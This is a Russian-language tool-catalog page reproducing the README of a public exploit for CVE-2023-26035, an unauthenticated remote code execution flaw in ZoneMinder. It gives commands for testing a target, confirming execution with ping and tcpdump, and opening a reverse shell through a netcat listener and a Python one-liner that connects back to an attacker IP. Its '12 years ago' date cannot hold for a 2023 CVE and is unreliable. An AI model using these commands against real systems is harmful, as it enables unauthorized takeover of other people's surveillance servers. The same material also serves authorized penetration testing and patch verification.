Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
zoneminder_CVE-2023-26035 — Эксплойт для CVE-2023-26035, затрагивающий ZoneMinder < 1.36.33 и < 1.37.33 | Kitploit
Инструменты/GitHubGitHub/0xfalafel/zoneminder_cve-2023-26035
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHub0xfalafel/zoneminder_cve-2023-26035

zoneminder_CVE-2023-26035

Эксплойт для CVE-2023-26035, затрагивающий ZoneMinder < 1.36.33 и < 1.37.33

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
12 лет назадЕщё не проверено

Эксплойт - ZoneMinder CVE-2023-26035

Существует Неаутентифицированное удаленное выполнение кода (RCE), затрагивающее снимки ZoneMinder.
Это эксплойт для CVE-2023-26035.

Затронутые версии

ZoneMinder < 1.36.33 и
ZoneMinder < 1.37.33.

Использование эксплойта

Использование

Проверка, уязвима ли цель:

root@kitploit:~
python3 zoneminder.py http://target

Выполнение команды

root@kitploit:~
python3 zoneminder.py http://target command

Примеры

Проверка выполнения команды с помощью ping

Запустите tcpdump на интерфейсе, подключенном к цели (здесь tun0), и отфильтруйте ICMP пакеты:

root@kitploit:~
sudo tcpdump -i tun0 icmp

Затем выполните пинг на ваш IP. Обязательно используйте кавычки ", иначе команда не будет интерпретирована правильно.

root@kitploit:~
python3 zoneminder.py http://target "ping -C 4 your_ip"

Обратная оболочка

Создайте слушатель с помощью netcat:

root@kitploit:~
nc -lvnp 1337

Используйте однострочник обратной оболочки:

root@kitploit:~
python3 zoneminder.py http://TARGET "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"

Больше на https://revshells.com.

Требования

Эксплойт использует requests и BeautifulSoup. Установите их с помощью:

root@kitploit:~
python3 -m pip install requests beautifulsoup4

Благодарности

Я просто хотел получить автономный эксплойт, не требующий Metasploit.
Скрипт основан на https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/zoneminder_snapshots.rb

https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr

Скачать инструмент